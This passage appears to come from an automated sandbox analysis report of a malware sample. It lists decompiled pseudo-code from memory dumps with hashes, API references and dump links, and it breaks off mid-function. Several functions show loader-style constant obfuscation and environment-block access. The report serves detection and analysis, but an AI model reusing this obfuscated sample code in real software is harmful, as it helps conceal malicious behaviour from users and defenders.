				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t116;
				intOrPtr* _t143;
				intOrPtr _t146;
				void* _t151;
				void* _t152;

				_t152 = _t151 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_push(0x77);
				_t143 = 0x22ca24;
				_push(0x67);
				_v8 = _v8 / 0;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / 0;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t146 =  *0x22ca24; // 0x0
				while(_t146 != 0) {
					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
						L5:
						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
						_t116 = E0021F536(_v20, _v40, _v48, _t146);
					} else {
						_t116 = E0022086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
						_t152 = _t152 + 0xc;
						if(_t116 != _v28) {
							_t108 = _t146 + 0x2c; // 0x2c
							_t143 = _t108;
						} else {
							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
							E0022422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
							E00224F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
							goto L5;
						}
					}
					_t146 =  *_t143;
				}
				return _t116;
			}

0x002298a6
0x002298a9
0x002298b2
0x002298bf
0x002298c3
0x002298cb
0x002298cd
0x002298d2
0x002298d6
0x002298dd
0x002298e9
0x002298ec
0x002298f3
0x002298fa
0x00229901
0x00229905
0x0022990c
0x00229913
0x0022991c
0x0022991f
0x00229926
0x0022992d
0x00229934
0x00229937
0x0022993b
0x00229942
0x00229949
0x0022994d
0x00229951
0x00229958
0x0022995f
0x00229966
0x0022996a
0x00229971
0x00229978
0x0022997f
0x00229986
0x0022998d
0x00229994
0x0022999b
0x002299a6
0x002299a9
0x002299b0
0x002299b7
0x002299be
0x002299c1
0x002299c8
0x002299cf
0x002299d3
0x002299d7
0x002299de
0x00229a46
0x002299ea
0x00229a2e
0x00229a3b
0x00229a3d
0x002299ec
0x002299f9
0x002299fe
0x00229a04
0x00229a51
0x00229a51
0x00229a06
0x00229a0d
0x00229a19
0x00229a27
0x00000000
0x00229a2d
0x00229a04
0x00229a44
0x00229a44
0x00229a50

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d697a72c8bcfc77458b8e4068285ff7886a5bfe7bcc4cae4bfa004b79ef3f634
Instruction ID: 1264b0ddde8e54463ed35da074f5f10867b0add18a7a15230fc8797e9253a29b
Opcode Fuzzy Hash: d697a72c8bcfc77458b8e4068285ff7886a5bfe7bcc4cae4bfa004b79ef3f634
Instruction Fuzzy Hash: 8F410171D0131DEBDB48CFE5D68A4DEBBB0BB14758F208059C115BA290C7B80B49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00227A0F, Relevance: .1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00227A0F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t43;
				void* _t47;
				void* _t50;
				void* _t56;
				void* _t57;

				_t50 = __ecx;
				_v16 = 0xca2c;
				_v16 = _v16 ^ 0x4de68128;
				_v16 = _v16 ^ 0x4de62eb9;
				_v8 = 0x8c11;
				_v8 = _v8 + 0x5792;
				_v8 = _v8 ^ 0x1f44ca2d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x10a60930;
				_v28 = 0x568d;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005e22;
				_v24 = 0x104e;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0x104e2f39;
				_v20 = 0x2b0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x000512d1;
				_v12 = 0x980d;
				_v12 = _v12 + 0x309b;
				_v12 = _v12 >> 1;
				_t56 = 0;
				_v12 = _v12 ^ 0x00001aed;
				_t43 = 0xce8bfa4;
				do {
					while(_t43 != 0xce8bfa4) {
						if(_t43 == 0x19c25828) {
							_push(_t50);
							_t47 = E00227F1B();
							_t57 = _t57 + 4;
							_t56 = _t56 + _t47;
							_t43 = 0x375743b0;
							continue;
						} else {
							if(_t43 != 0x375743b0) {
								goto L8;
							} else {
								_t56 = _t56 + E0021D64E(_v28, _v24, _v20, _t50 + 4, _v12);
							}
						}
						L5:
						return _t56;
					}
					_t43 = 0x19c25828;
					L8:
				} while (_t43 != 0x2a4614b);
				goto L5;
			}

0x00227a0f
0x00227a15
0x00227a21
0x00227a28
0x00227a2f
0x00227a36
0x00227a3d
0x00227a44
0x00227a48
0x00227a4f
0x00227a56
0x00227a5a
0x00227a61
0x00227a68
0x00227a6c
0x00227a73
0x00227a7a
0x00227a7e
0x00227a86
0x00227a92
0x00227a99
0x00227aa3
0x00227aa5
0x00227aac
0x00227aae
0x00227aae
0x00227ab4
0x00227ae3
0x00227ae4
0x00227ae9
0x00227aec
0x00227aee
0x00000000
0x00227ab6
0x00227ab8
0x00000000
0x00227aba
0x00227ad2
0x00227ad2
0x00227ab8
0x00227ad5
0x00227adc
0x00227adc
0x00227af2
0x00227af4
0x00227af4
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction ID: 67843cef827e4863f311dca9696c941db78795dcf593116e747ba563801eb9cd
Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction Fuzzy Hash: 22219A71E18229ABDB44DFE4E88A4AFFBB0FB10318F648059D505B3241E7B54B54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0022687F, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0022687F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t63;
				signed int _t72;

				_v32 = 4;
				_v8 = 0xaf15;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x6e7b;
				_v8 = _v8 ^ 0x2016511b;
				_v24 = 0x477;
				_v24 = _v24 + 0xffffb380;
				_t72 = 0x7f;
				_v24 = _v24 / _t72;
				_v24 = _v24 ^ 0x02042a92;
				_v20 = 0x93b6;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x44f1257f;
				_v20 = _v20 ^ 0x44eaddee;
				_v16 = 0x6bfa;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff28a3;
				_v16 = _v16 ^ 0xffff7b62;
				_v28 = 0xaf58;
				_v28 = _v28 ^ 0x6486cb7d;
				_v28 = _v28 ^ 0x6486241a;
				_v12 = 0x7e30;
				_v12 = _v12 + 0x9611;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x22884747;
				_t63 = E0022674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
				asm("sbb eax, eax");
				return  ~_t63 & _v36;
			}

0x00226885
0x0022688c
0x00226893
0x00226897
0x0022689b
0x002268a2
0x002268a9
0x002268b0
0x002268be
0x002268c5
0x002268c8
0x002268cf
0x002268da
0x002268e0
0x002268e7
0x002268ee
0x002268f5
0x002268f9
0x00226900
0x00226907
0x0022690e
0x00226915
0x0022691c
0x00226923
0x0022692a
0x0022692e
0x00226950
0x0022695a
0x00226964

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction ID: 21d3c4fef8b76ca4eb3191ee766872ffda50e294096e11cc554cee0f39b12b96
Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction Fuzzy Hash: 2821E0B2D0021EABDB15CFE1C94A9EEFBB5FB10204F108299D521B61A0D3B84B59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0021C4FF, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0021C4FF() {

				return  *[fs:0x30];
			}

0x0021c505

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10007337, Relevance: 19.6, APIs: 13, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10007337(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x10014d88);
				_t25 =  *0x100132dc; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E10004732( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x100132dc; // 0x0
				}
				_push(_t14);
				E10004732(_t25);
				_t26 =  *0x100132d8; // 0x0
				 *0x100132dc = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E10004732( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x100132d8; // 0x0
				}
				E10004732(_t26);
				 *0x100132d8 = 0;
				E10004732( *0x100132d4);
				_t5 = E10004732( *0x100132d0);
				 *0x100132d4 = 0;
				 *0x100132d0 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E10004732(_t24);
				}
				__imp__EncodePointer(0);
				 *0x10014d88 = _t5;
				_t6 =  *0x10013c1c; // 0x0
				if(_t6 != 0) {
					E10004732(_t6);
					 *0x10013c1c = 0;
				}
				_t7 =  *0x10013c20; // 0x0
				if(_t7 != 0) {
					E10004732(_t7);
					 *0x10013c20 = 0;
				}
				_t8 = InterlockedDecrement( *0x10012394);
				if(_t8 == 0) {
					_t8 =  *0x10012394; // 0x10012690
					if(_t8 != 0x10012690) {
						_t9 = E10004732(_t8);
						 *0x10012394 = 0x10012690;
						return _t9;
					}
				}
				return _t8;
			}

0x10007337
0x1000733f
0x10007345
0x1000734b
0x1000734f
0x10007351
0x10007358
0x1000735e
0x10007361
0x00000000
0x00000000
0x00000000
0x10007361
0x10007363
0x10007363
0x10007369
0x1000736b
0x10007370
0x10007379
0x10007381
0x10007383
0x10007389
0x1000738f
0x10007392
0x00000000
0x00000000
0x00000000
0x10007392
0x10007394
0x10007394
0x1000739b
0x100073a6
0x100073ac
0x100073b7
0x100073bf
0x100073c5
0x100073ce
0x100073d1
0x100073d6
0x100073d8
0x100073de
0x100073e3
0x100073ea
0x100073ed
0x100073f3
0x100073f3
0x100073f9
0x10007400
0x10007403
0x10007409
0x10007409
0x10007415
0x1000741e
0x10007420
0x1000742c
0x1000742f
0x10007435
0x00000000
0x10007435
0x1000742c
0x1000743d

APIs

DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
_free.LIBCMT ref: 10007358

Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758

_free.LIBCMT ref: 1000736B
_free.LIBCMT ref: 10007389
_free.LIBCMT ref: 1000739B
_free.LIBCMT ref: 100073AC
_free.LIBCMT ref: 100073B7
_free.LIBCMT ref: 100073D1
EncodePointer.KERNEL32(00000000), ref: 100073D8
_free.LIBCMT ref: 100073ED
_free.LIBCMT ref: 10007403
InterlockedDecrement.KERNEL32 ref: 10007415
_free.LIBCMT ref: 1000742F

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
String ID:
API String ID: 4264854383-0
Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94

Uniqueness

Uniqueness Score: -1.00%

Function 10002F70, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v528;
				char _v1048;
				void* _v1052;
				void* _v1056;
				char _v1060;
				void* _v1064;
				char _v1068;
				char _v1084;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				char* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr _t75;
				intOrPtr* _t76;
				intOrPtr _t80;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr _t84;
				intOrPtr* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr _t93;
				intOrPtr* _t94;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t104;
				intOrPtr* _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t115;
				intOrPtr* _t120;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t136;
				signed int _t138;
				intOrPtr _t152;

				_t63 =  *0x10012158; // 0x4693ee51
				_v8 = _t63 ^ _t138;
				_t137 = _a4;
				_t136 = _a8;
				_t115 = __ecx;
				E100043E0( &_v528, 0, 0x208);
				_t67 =  &_v528;
				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
					L25:
					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
				} else {
					_t71 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1064;
					_v1064 = 0;
					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
					if(_t72 != 0) {
						_t137 = 0x8000ffff;
						L24:
						__imp__CoTaskMemFree(_v1068);
						goto L25;
					}
					_t120 = _v1064;
					_t134 =  &_v1060;
					_v1060 = _t72;
					_v1056 = _t120;
					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
					_t137 = _t75;
					if(_t75 == 0) {
						L6:
						if(_t152 < 0) {
							L22:
							_t76 = _v1064;
							 *((intOrPtr*)( *_t76 + 8))(_t76);
							goto L24;
						}
						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
						_t137 = _t80;
						if(_t80 < 0) {
							L21:
							_t81 = _v1060;
							 *((intOrPtr*)( *_t81 + 8))(_t81);
							goto L22;
						}
						_v1056 = 0;
						if( *_t136 == 0) {
							_t83 = _v1060;
							_t134 =  &_v1048;
							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
							_t137 = _t84;
							if(_t84 != 0) {
								goto L21;
							}
							_t85 = _v1060;
							_t134 =  &_v1052;
							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
							_t137 = _t86;
							if(_t86 < 0) {
								L20:
								_t87 = _v1056;
								 *((intOrPtr*)( *_t87 + 8))(_t87);
								goto L21;
							}
							L19:
							_t89 = _v1052;
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							goto L20;
						}
						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
						_t137 = _t93;
						if(_t93 < 0) {
							goto L21;
						}
						_t94 = _v1056;
						_t134 =  &_v1052;
						_v1052 = 0;
						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
						_t137 = _t95;
						if(_t95 < 0) {
							goto L20;
						}
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x448], xmm0");
						asm("movq [ebp-0x440], xmm0");
						_t98 = E10002390( &_v528,  &_v1100);
						_t137 = _t98;
						if(_t98 >= 0) {
							asm("xorps xmm0, xmm0");
							asm("movq [ebp-0x438], xmm0");
							asm("movq [ebp-0x430], xmm0");
							_t100 = E10002390(_v1068,  &_v1084);
							_t136 = __imp__#9;
							_t137 = _t100;
							if(_t100 >= 0) {
								_t129 = _v1052;
								asm("movq xmm0, [ebp-0x448]");
								_t134 =  *_t129;
								asm("movq [eax], xmm0");
								asm("movq xmm0, [ebp-0x440]");
								asm("movq [eax+0x8], xmm0");
								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
								_t137 = _t104;
								if(_t104 >= 0) {
									_t130 = _v1052;
									asm("movq xmm0, [ebp-0x438]");
									_t134 =  *_t130;
									asm("movq [eax], xmm0");
									asm("movq xmm0, [ebp-0x430]");
									asm("movq [eax+0x8], xmm0");
									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
								}
								 *_t136( &_v1084);
							}
							 *_t136( &_v1100);
						}
						goto L19;
					}
					_t109 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1052;
					_v1052 = 0;
					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
					_t137 = _t110;
					if(_t110 < 0) {
						goto L22;
					}
					_t132 = _v1056;
					_t134 =  &_v1060;
					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
					_t137 = _t112;
					_t113 = _v1052;
					 *((intOrPtr*)( *_t113 + 8))(_t113);
					_t152 = _t112;
					goto L6;
				}
			}

0x10002f79
0x10002f80
0x10002f85
0x10002f89
0x10002f9a
0x10002f9c
0x10002fa4
0x10002fb1
0x10002fb9
0x10003285
0x10003295
0x10002fd7
0x10002fd7
0x10002fda
0x10002fe0
0x10002fee
0x10002ff6
0x10003272
0x10003277
0x1000327d
0x00000000
0x10003283
0x10002ffc
0x10003002
0x10003009
0x10003017
0x1000301d
0x10003023
0x10003027
0x1000307e
0x1000307e
0x10003264
0x10003264
0x1000326d
0x00000000
0x1000326d
0x1000309c
0x100030a1
0x100030a8
0x10003258
0x10003258
0x10003261
0x00000000
0x10003261
0x100030b2
0x100030bc
0x100031fe
0x1000320d
0x10003215
0x1000321b
0x1000321f
0x00000000
0x00000000
0x10003221
0x10003227
0x10003237
0x1000323a
0x1000323e
0x1000324c
0x1000324c
0x10003255
0x00000000
0x10003255
0x10003240
0x10003240
0x10003249
0x00000000
0x10003249
0x100030dd
0x100030e2
0x100030e6
0x00000000
0x00000000
0x100030ec
0x100030f2
0x100030f9
0x1000310b
0x1000310d
0x10003111
0x00000000
0x00000000
0x1000311e
0x10003128
0x10003130
0x10003138
0x1000313d
0x10003144
0x10003157
0x1000315a
0x10003162
0x1000316a
0x1000316f
0x10003175
0x1000317c
0x1000317e
0x10003184
0x1000318c
0x10003198
0x1000319c
0x100031a5
0x100031aa
0x100031b0
0x100031b4
0x100031b6
0x100031bc
0x100031c4
0x100031d0
0x100031d4
0x100031dd
0x100031e8
0x100031e8
0x100031f1
0x100031f1
0x100031fa
0x100031fa
0x00000000
0x10003144
0x10003029
0x1000302c
0x10003033
0x10003045
0x1000304b
0x1000304f
0x00000000
0x00000000
0x10003055
0x1000305b
0x1000306b
0x1000306e
0x10003070
0x10003079
0x1000307c
0x00000000
0x1000307c

APIs

_memset.LIBCMT ref: 10002F9C
PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1

Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6

VariantClear.OLEAUT32(?), ref: 100031F1
VariantClear.OLEAUT32(?), ref: 100031FA
CoTaskMemFree.OLE32(?), ref: 1000327D

Strings

EncodedValue, xrefs: 100031CB
Property, xrefs: 100030D0
Property[@Key = '%s'], xrefs: 1000308B
Key, xrefs: 10003193
ExtendedProperties, xrefs: 10003011, 1000303F

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
API String ID: 2822920939-4160240301
Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10007719, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10010d68);
				E10008040(__ebx, __edi, __esi);
				E100091AB(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10014c80 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E10007F1D();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10014c80 = _t81;
						 *0x10014c64 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10014c80;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10014c80 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10013c48; // 0x0
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -268520564
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E100079DD();
							L2:
							_t86 = 1;
							L3:
							return E10008085(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10014c64 < _t135) {
							_t138 = E10007F1D(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10014c80[_t149] = _t138;
								 *0x10014c64 =  *0x10014c64 + _t141;
								while(_t138 <  &(0x10014c80[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
